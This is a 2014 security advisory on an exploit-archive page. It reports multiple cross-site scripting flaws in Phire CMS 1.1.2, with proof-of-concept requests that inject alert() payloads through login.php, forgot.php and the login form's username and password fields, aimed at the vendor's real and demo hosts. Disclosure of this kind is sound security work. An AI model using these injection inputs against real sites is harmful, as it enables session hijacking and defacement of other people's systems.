Phire CMS 1.1.2 Multiple XSS

2014.01.25

Credit: Smash_

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#Title: Phire CMS 1.1.2 - Multiple XSS
#Vendor: phirecms.org - en.wikipedia.org/wiki/Phire_CMS
#Version: 1.1.2 (Latest ATM)
#Demo: demo.phirecms.org
#Date: 01.25.2014
#Contact: smash[at]devilteam.org
1. Cross Site Scripting
a) login.php
Request:
host/phire/login.php/666"><img%20src%3d666%20onerror%3dalert(666)>
Injection point:
<form action="/phire/login.php/666"><img src=666 onerror=alert(666)>"
PoC:
phirecms.org/phire/login.php/666"><img%20src%3d666%20onerror%3dalert(666)> (...)
b) forgot.php
Request:
host/phire/forgot.php/666"><img%20src%3d666%20onerror%3dalert(666)>
Same as above.
c) POST - username & password
Request:
POST /phire/login.php HTTP/1.1
Host: demo.phirecms.org
username=666" onmouseover=alert(666) bad="0&password=777" onmouseover=alert(777) bad="&submit=LOGIN
Injection point:
<input type="text" name="username" id="username" value="666\" onmouseover=alert(666) bad=\"0" style="width: 220px;" size="35" />
(...)
<input type="password" name="password" id="password" value="777\" onmouseover=alert(777) bad=\"" style="width: 220px;" size="35" />

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Phire CMS 1.1.2 Multiple XSS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.